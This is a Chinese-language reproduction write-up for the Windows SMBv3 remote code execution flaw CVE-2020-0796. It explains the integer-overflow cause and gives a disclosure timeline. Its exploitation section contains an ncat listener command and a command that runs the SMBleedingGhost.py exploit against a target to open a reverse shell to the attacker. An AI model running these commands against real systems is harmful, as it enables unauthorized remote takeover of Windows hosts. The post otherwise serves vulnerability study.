SMBv3遠程代碼執行漏洞復現(CVE-2020-0796)


漏洞基本信息

服務器消息塊(SMB),是一個網絡通信協議,用於提供共享訪問到文件,打印機和串行端口的節點之間的網絡上。它還提供了經過身份驗證的進程間通信機制。SMB的大多數用法涉及運行Microsoft Windows的計算機,在引入Active Directory之前被稱為“ Microsoft Windows網絡” 。相應的Windows服務是用於服務器組件的LAN Manager服務器和用於客戶端組件的LAN Manager工作站。
Windows 10和Windows Server 2016引入了SMB 3.1.1 。除了在SMB3中添加的AES-128 CCM加密外,該版本還支持AES-128 GCM加密,並使用SHA-512哈希實現預認證完整性檢查。當使用SMB 2.x和更高版本連接到客戶端時,SMB 3.1.1還使安全協商成為必需。
CVE-2020-0796,微軟SMBv3 Client/Server遠程代碼執行漏洞。該漏洞存在於srv2.sys文件中,由於SMB沒有正確處理壓縮的數據包,在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢出。

漏洞復現

漏洞POC驗證

SMBv3漏洞檢測POC

漏洞EXP利用

1、nc端口監聽

2、

python3 SMBleedingGhost.py 192.168.2.153 192.168.2.137 8888

//說明:
//ncat -lvp <port>
//SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

SMBv3漏洞EXP

漏洞時間線

3月10日:微軟發布安全通告ADV200005,稱SMBv3協議在處理某些請求的方式中存在代碼執行漏洞,並提供了緩解措施。

3月11日:國外某廠商針對該漏洞發布安全防護規則更新。

3月11日:微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)通告。

3月12日:微軟正式發布CVE-2020-0796安全通告和漏洞修復補丁。

3月13日:微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)處置手冊。

導致系統藍屏的漏洞利用程序:

3月30日:該漏洞本地提權PoC流出。

3月31日:復現本地提權利用並發布PoC情報。

4月14日:有國外研究者發布疑似漏洞利用EXP演示視頻,鏈接https://twitter.com/RicercaSec/status/1249904222490918917。

6月2日:監測到研究人員公布此漏洞遠程利用代碼,現實威脅提升。

6月3日:該漏洞遠程利用PoC公開通告。

SMBv3漏洞本地提權
msf集成
微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)PoC公開處置手冊

待更新

RCE

漏洞原理分析

https://www.cnblogs.com/backlion/p/13050249.html

聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM